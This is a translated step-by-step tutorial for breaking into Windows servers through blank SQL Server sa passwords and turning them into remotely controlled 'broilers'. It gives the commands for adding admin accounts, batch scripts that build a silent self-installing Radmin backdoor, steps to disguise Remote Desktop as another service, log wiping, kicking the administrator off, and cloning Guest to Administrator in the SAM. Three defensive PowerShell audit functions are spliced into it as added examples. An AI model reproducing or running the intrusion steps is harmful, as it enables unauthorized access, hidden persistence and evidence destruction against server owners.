Full walkthrough of a 3389 (Remote Desktop) intrusion _ Security settings

Source: Internet
Author: User
Tags: microsoft sql server, rar
This is the distillation of several years of my own experience.

Tools: WinNTAutoAttack (automated attack tool; sweeps for vulnerabilities); SqlTools (connects to SQL Server with a blank sa password); Radmin Shadow 3.0 Chinese version (remote-control program) (Radmin registration code:

08us9a95i+lka9nbolxqv0v8xqddvkgcnctpn2wv11isqocvua
6a5kkzrhc5gvmiybwomk6rnwoj8myy8lxrfi23); SC.exe, Port.bat, Query.exe, Quser.exe (hide the 3389 service so that the administrator does not notice our program); CleanIISLog.exe (wipes the IIS logs to cover our tracks); 3389.exe (enables the 3389 Terminal Services port); Psu.exe (runs a program under another process's account; used later in the Guest-account step); Mstsc.exe (the Remote Desktop Connection client).

One. Sweep for weak SA passwords (with the automatic attacker)

Two. Create a user over the SqlTools connection


net start telnet
(start the Telnet service)
net user mint mint /add
(add the user mint with the password mint)
net localgroup Administrators mint /add
(promote the account mint to Administrator)


Three. Upload the backdoor program RAD.EXE (a self-extracting Radmin server package)

Making RAD.EXE:

1. From the Radmin installation directory take AdmDll.dll, Raddrv.dll and r_server.exe;

2. Configure the server locally first (this step is required):

Set the password -->> set the connection port (default 4899) -->> build

3. Export the registry key HKEY_LOCAL_MACHINE\SYSTEM\Radmin to 1.reg;

4. Write a first batch file, named U.bat:


@echo off
net stop r_server


5. Write a second batch file, R.bat, with this content:


@echo off
@explorer.exe /uninstall /silence
@explorer.exe /install /silence
@regedit /s 1.reg
@net start r_server
@del rad.exe
@del 1.reg
@del r.bat
@del u.bat


(explorer.exe here is the renamed r_server.exe from step 6, not the Windows shell: the batch file removes any existing Radmin service, reinstalls it silently, imports the saved settings from 1.reg, starts the service and then deletes its own traces.)

6. Compress AdmDll.dll, Raddrv.dll, explorer.exe (r_server.exe renamed), U.bat and R.bat into the archive Rad.rar;

7. Turn Rad.rar into a self-extracting file:

Select the Default.sfx self-extraction module -->> Advanced SFX options

-->> General

Extraction path: %SystemRoot%\System32

Setup: Run after extraction: R.bat; Run before extraction: U.bat

-->> Modes

Silent mode: Hide all; Overwrite: Overwrite all files

-->> OK -->> OK

Build completed.

Four. Connect with the Radmin client

Upload the following files to C:\Winnt (on XP the directory is C:\Windows):

Port.bat (if the target is XP, change Winnt to Windows inside this file)

Query.exe Quser.exe

SC.exe

CleanIISLog.exe

3389.exe

Psu.exe

It is best to also upload a reverse-connecting (bounce) Radmin backdoor over Telnet.

Run C:\winnt\3389.exe and reboot the compromised machine (the "broiler").

Five. Connect over Remote Desktop after the reboot

Sometimes there is a problem.

When logging in over 3389 you may find that the logon sessions are full. Do not worry; we kick one of them off.

Telnet to the target IP and you find that it requires NTLM authentication. So on our own computer we create an account named mint with the password mint and make it an administrator.

Find C:\winnt\system32\cmd.exe and create a shortcut to it on the desktop. Change the shortcut's properties to allow it to run under a different identity. Then run the cmd.exe shortcut on the desktop, enter the account mint with password mint, and telnet to the target IP; the logon goes straight through, because the telnet client authenticates with the mint credentials, which match the account we created on the target.

Command to use:

C:\>query user (shows who is currently logged on to the target's terminal server)

Command to run:

C:\>logoff 1 (kick the administrator in session 1 off)

Then check again with C:\>query user (this is also why we do not run 1.bat straight away).

Six. After connecting, run under CMD:

C:\winnt\log <your own IP> (wipes your traces from the logs)

C:\winnt\1.bat (deletes and overwrites the files that show the currently logged-on users)

Seven. Patch the SA null-password hole

Programs -->> Microsoft SQL Server -->> Query Analyzer (the magnifier icon)

-->> log in with Windows authentication

Paste this code:


if exists (select * from dbo.sysobjects
           where id = object_id(N'[dbo].[xp_cmdshell]')
           and OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
    exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
GO


Press F5 (run), close Query Analyzer, then log in once more with SQL Server authentication and exit (this is so that no record is left behind).

Note that this only drops the xp_cmdshell extended procedure, so that the next person cannot run OS commands through SQL Server; it does not set a password on sa.
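Since the whole chain starts from a blank sa password and ends by dropping xp_cmdshell, the check a defender wants is an audit of both. The following Windows PowerShell function is an added example, not part of the original tutorial. It assumes a SQL Server 2005 or later instance (sys.sql_logins and sys.configurations do not exist on the SQL Server 2000 the tutorial targets) reachable with the current Windows login, which must hold CONTROL SERVER to read password hashes; the instance name is a placeholder.

```powershell
# Added audit example (not from the tutorial). Assumes SQL Server 2005+ and a
# Windows login with CONTROL SERVER; $Instance is a placeholder.
function Get-SqlEntryPointAudit {
    param([string]$Instance = 'localhost')   # assumed instance name

    $conn = New-Object System.Data.SqlClient.SqlConnection(
        "Server=$Instance;Integrated Security=True")
    $conn.Open()
    try {
        $cmd = $conn.CreateCommand()

        # PWDCOMPARE tests a candidate password against the stored hash, so this
        # finds what the 'sweep for weak SA passwords' step finds: blank
        # passwords, and passwords equal to the login name.
        $cmd.CommandText = @"
SELECT name,
       is_disabled,
       PWDCOMPARE('', password_hash)   AS blank_password,
       PWDCOMPARE(name, password_hash) AS name_as_password
FROM sys.sql_logins;
"@
        $weak = @()
        $reader = $cmd.ExecuteReader()
        while ($reader.Read()) {
            if ($reader['blank_password'] -eq 1 -or $reader['name_as_password'] -eq 1) {
                $weak += [pscustomobject]@{
                    Login          = $reader['name']
                    Disabled       = [bool]$reader['is_disabled']
                    BlankPassword  = ($reader['blank_password'] -eq 1)
                    NameAsPassword = ($reader['name_as_password'] -eq 1)
                }
            }
        }
        $reader.Close()

        # Whether the OS-command path the tutorial removes (xp_cmdshell) is on.
        $cmd.CommandText = "SELECT value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell';"
        $xpCmdShellOn = ([int]$cmd.ExecuteScalar() -eq 1)

        [pscustomobject]@{
            Instance          = $Instance
            XpCmdShellEnabled = $xpCmdShellOn
            WeakLogins        = $weak
        }
    }
    finally {
        $conn.Close()
    }
}

# Usage: Get-SqlEntryPointAudit -Instance 'SQLHOST\INSTANCE' | Format-List
```

A login listed under WeakLogins with BlankPassword set is exactly the entry point the sweep in step One looks for; fix it with ALTER LOGIN rather than by removing xp_cmdshell, which closes only one of the things a sysadmin login can do.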

Eight. Change the 3389 port and the service name

To change the server's port there are two places in the registry to modify.

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp], the PortNumber value. The default is 3389; select Decimal and change it to the port you want, for example 1314.

The second place:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp], the PortNumber value. The default is 3389; select Decimal and change it to the port you want, for example 1314.

The system must be rebooted before the new port can be used. (No hurry: change the service name first, then reboot.)

Export the 3389 service's key

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]

to a file Mm.reg. Edit Mm.reg and replace TermService with Alerter (the error-alert service; any other service will do as well). Then change line 10, "Description"=..., to the description of the service you are impersonating (for Alerter: notifies selected users and computers of administrative alerts), and line 11, "DisplayName"=..., to that service's display name (here Alerter). Save the file. Before importing it, open the Service Manager (run services.msc; you can launch it from CMD) and stop the Alerter service first. Then import the registry file.

Then, again under CMD:


cd c:\winnt\system32
copy termsrv.exe service.exe
(copy termsrv.exe to a file name that resembles the Alerter service's own binary)
cd c:\winnt
sc \\127.0.0.1 config Alerter binpath= c:\winnt\system32\service.exe
(this points the Alerter service at the new binary; type the service name exactly, with a capital A)
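What this step leaves behind is measurable: two PortNumber values that have moved off 3389, a service registration that no longer carries the TermService name, and a second service binary that is a byte-for-byte copy of another one under a different file name. The following Windows PowerShell function is an added example, not part of the original tutorial; it assumes it is run elevated on the host being checked and reads only the registry keys named above plus the Services hive.

```powershell
# Added audit example, not from the tutorial. Reports the two PortNumber values
# the tutorial edits, whether the TermService registration still exists, and any
# services whose executables are identical copies under different file names
# (what 'copy termsrv.exe service.exe' + 'sc config ... binpath=' produces).
# Assumes an elevated session on the host being checked.
function Get-RdpTamperReport {
    $tdsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp'
    $winKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp'
    $tdsPort = (Get-ItemProperty -LiteralPath $tdsKey -Name PortNumber).PortNumber
    $winPort = (Get-ItemProperty -LiteralPath $winKey -Name PortNumber).PortNumber

    # Read service registrations straight from the registry, so a TermService
    # key re-imported under another name is seen under that name.
    $svcRoot = 'HKLM:\SYSTEM\CurrentControlSet\Services'
    $binaries = foreach ($key in Get-ChildItem -LiteralPath $svcRoot) {
        $props = Get-ItemProperty -LiteralPath $key.PSPath -ErrorAction SilentlyContinue
        if (-not $props -or -not $props.ImagePath) { continue }

        # Normalise ImagePath to a plain executable path: expand %SystemRoot%,
        # drop quotes and arguments, and resolve the \??\, \SystemRoot\ and
        # bare 'system32\...' forms drivers and services use. An unquoted path
        # containing spaces is split at the first space and simply skipped.
        $raw = [Environment]::ExpandEnvironmentVariables($props.ImagePath)
        $exe = if ($raw -match '^"([^"]+)"') { $Matches[1] } else { ($raw -split '\s+')[0] }
        $exe = $exe -replace '^\\\?\?\\', '' -replace '^\\SystemRoot\\', "$env:SystemRoot\"
        if ($exe -notmatch '^[A-Za-z]:\\') { $exe = Join-Path $env:SystemRoot $exe }
        if (-not (Test-Path -LiteralPath $exe -PathType Leaf)) { continue }

        [pscustomobject]@{
            Service     = $key.PSChildName
            DisplayName = $props.DisplayName
            Exe         = $exe
            Sha256      = (Get-FileHash -LiteralPath $exe -Algorithm SHA256).Hash
        }
    }

    # Same file content reachable under more than one file name.
    $clones = $binaries |
        Group-Object Sha256 |
        Where-Object { @($_.Group.Exe | Sort-Object -Unique).Count -gt 1 } |
        ForEach-Object { $_.Group | Select-Object Service, DisplayName, Exe }

    [pscustomobject]@{
        TdsPort             = $tdsPort
        WinStationPort      = $winPort
        PortsConsistent     = ($tdsPort -eq $winPort)
        NonDefaultPort      = ($winPort -ne 3389)
        TermServiceMissing  = -not (Test-Path -LiteralPath "$svcRoot\TermService")
        ClonedServiceBinary = @($clones)
    }
}

# Usage: Get-RdpTamperReport | Format-List
```

A NonDefaultPort result is not by itself a finding (administrators move RDP off 3389 too), but NonDefaultPort together with TermServiceMissing or a ClonedServiceBinary entry named after an unrelated service is the pattern this section describes.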





Nine. After cleaning up (better still, clear the injection point directly), use Radmin to reboot the machine.

Ten. Log in with the disabled [Guest] account and delete the account you created at the start

1. Use Psu.exe to open the registry at

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users

Usage: psu -p regedit -i PID

The PID is found by right-clicking an empty part of the taskbar -->> Task Manager -->> Processes; the number after winlogon.exe is the PID.

For example: psu -p regedit -i 157

The method for cloning the Guest account to Administrator privileges:

Find the type value of HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Administrator (the type is the account's RID, shown in hex).

Under HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\ find the subkey named after that type value and copy its binary F value over the F value of the Guest's corresponding subkey (found the same way, via Users\Names\Guest).

Export the Guest's configuration (that is, export both HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest and the subkey named after its type value), then delete the Guest's configuration.

2. Viewing the account list in Computer Management may now throw an error [account not found] (this step can be skipped).

3. Restore the Guest's configuration (import the two .reg files into the registry).

4. Change the Guest account's password and disable the Guest account from the command line [this must be done at the command line]:


net user guest ****
(set a new password in place of ****)
net user guest /active:yes
net user guest /active:no
(disable Guest from the command line)


5. Verify that the disabled Guest account can still be used.

6. After logging in as Guest, delete the account you created:


net user mint /del


The whole process is over.
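The trace this step leaves is a SAM user subkey whose F value was copied from a different account: the key is still named after the Guest's RID, but the RID stored inside the F value is the Administrator's. The following Windows PowerShell function is an added detection example, not part of the original tutorial. It assumes it runs as SYSTEM (HKLM\SAM is not readable by administrators, which is why the tutorial needs psu.exe; psexec -s powershell.exe is the usual way), and it assumes the commonly documented F-value layout, with the RID at offset 0x30 and the account-control bits at 0x38, which the tutorial itself does not state.

```powershell
# Added detection example, not from the tutorial. Must run as SYSTEM.
# Offsets 0x30 (RID) and 0x38 (account control flags) inside the F value are
# assumed from the commonly documented SAM layout.
function Get-SamRidMismatch {
    $usersKey = 'HKLM:\SAM\SAM\Domains\Account\Users'
    foreach ($key in Get-ChildItem -LiteralPath $usersKey -ErrorAction Stop) {
        # User subkeys are eight hex digits (the RID); skip the 'Names' subkey.
        if ($key.PSChildName -notmatch '^[0-9A-Fa-f]{8}$') { continue }
        $keyRid = [Convert]::ToUInt32($key.PSChildName, 16)

        $f = (Get-ItemProperty -LiteralPath $key.PSPath -Name F -ErrorAction SilentlyContinue).F
        if (-not $f -or $f.Length -lt 0x3A) { continue }

        $embeddedRid = [BitConverter]::ToUInt32($f, 0x30)
        $acb         = [BitConverter]::ToUInt16($f, 0x38)

        [pscustomobject]@{
            Key         = $key.PSChildName
            KeyRid      = $keyRid
            EmbeddedRid = $embeddedRid
            Disabled    = [bool]($acb -band 0x0001)   # ACB 'account disabled' bit
            # A key whose F value names another account's RID has had that
            # account's F value copied over it, as in the Guest clone above.
            Cloned      = ($keyRid -ne $embeddedRid)
        }
    }
}

# Usage: Get-SamRidMismatch | Where-Object Cloned | Format-Table
```

For the procedure in this section the expected output is the 000001F5 key (Guest) reporting EmbeddedRid 500, the Administrator's RID, with Disabled set once step 4 has run; an ordinary host reports no rows with Cloned set.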


Finally, it is best to change the Radmin service as well; leave more back doors and you have more ways back in, hehe. The whole process is finished, and the machine has really become your broiler.
